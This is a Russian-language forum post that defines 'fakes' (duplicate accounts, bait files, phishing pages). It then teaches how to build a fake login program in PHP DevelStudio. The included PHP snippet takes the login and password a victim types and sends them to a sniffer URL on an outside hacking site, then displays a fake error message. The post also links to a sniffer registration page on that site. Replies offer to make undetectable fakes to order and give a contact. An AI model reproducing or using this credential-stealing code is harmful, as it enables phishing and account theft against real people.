Что такое фейк? И как сделать фейк программу

Авторизация

• Автор

Что такое фейк
    многие хоть раз задумывались что такое фейк так вот читайте
    Фейк (фэйк, от англ. fake — подделка) имеет множество значений.

Фейк (аккаунт)

Фейком называется второй или более зарегистрированный на ресурсе аккаунт одного человека (см. также мульт, виртуал). Зачастую, фейки регистрируются тогда, когда основной аккаунт находится в бане, для того, чтобы не терять доступ к ресурс.
    Фейк (p2p)

Фейком называется файл, имеющий название и прочие атрибуты, совпадающие или сходные с искомыми, но искомым не являющийся. Есть 2 типа: большие и маленькие. Большие - как правило, фильмы и игрушки. Бывало же, что скачиваете какой-нибудь свежий фильм, в предвкушении запускаете - а там вместо киноэпопеи второсортное порево ? Используются такие подлянки для накручивания рейтингов и издевательства над народом. Маленькие - всяческие кряки и кейгены. Используются для распространения троянов и вирусов (хотя, иногда бывает два в одном: кряк честно крякает то, для чего он предназначен, но трояна таки засаживает). Иногда бывает, что вместо искомого файла человек находит простую кучку нулей, букв "А" etc. размером с нормальный файл.

Фейк (веб-страницы)

Фейком называется страница или сайт, где находится точная копия какого-либо веб-сайта, для просмотра которого нужна обязательная авторизация. Используется для кражи логинов и паролей у нубов. Принцип действия: жертва получает ссылку на сайт, авторизуется с настоящим логином, данные отправляются в файл на сайте, злоумышленник получает логин и пароль жертвы и входит на сайт.

Фейком в широком смысле слова называется любая подделка, выдаваемая за настоящую вещь. К примеру, считается, что все фотографии НЛО — фейки.
    Как создать фейк программу
    Для начала необходимо зарегистрировать на сниффере. Вот ссылка на регистрацию https://hacker-pro.net/sniffer/index.php

Итак, после успешной регистрации заходим в свой аккаунт и нажимаем на ссылочку настройки
    image
    Работа со сниффером закончена!!! Переходим непосредственно к самой PHP DEVEL STUDIO. Скачать программу можно по этой сылке
    Открываем программу и видим перед собой окно, в котором мы и будем работать.
    image
    Из меню компоненты перетаскиваем на форму два "Поля для ввода”, одну "Кнопку” и две текстовых строки (Текс - TLabel).

Вот что должно получится:image
    Теперь все это дело необходимо отредактировать в меню "Свойства и События"
    image
    Для того что бы сделать ввод слов в строку Пароля звездочкой нужно в меню "Свойства и События" в "Буква Пароля" поставить *

Ну с дизайном мы закончили (думаю не стоит показывать как добавлять картинку на нашу форму).

Перейдем теперь к самому коду, что бы данные, которые вводились, приходили вам на сниффер.

Нажимаем на кнопку и переходим с меню Свойств в меню Событий, и жмем на кнопку Добавить события

Открывается окно - вставляем в него вот это код:
    $edit1 = c('Form1->edit1')->text;
    $edit2 = c('Form1->edit2')->text;
    $combobox1 = c('Form1->combobox1')->inText;
    $url = "Ваша картинка";

file_get_contents($url . "?" .
    "login:" . $edit1 . "|pass:" . $edit2);
    MessageBox("Причина ошибки.", "Ошибка.");

кому понравелось
    от плюсика неоткажусь

• Я могу сделать под заказ!

• Я тоже могу!

• Автор

да это все могут=)

• Делаю фейки на Microsoft Visual Studio!!! Также могу на Delphi!!! На заказ!!!
    Фейки креативные!!! Не паляться!!! Расценки в личку : [email protected]

Авторизация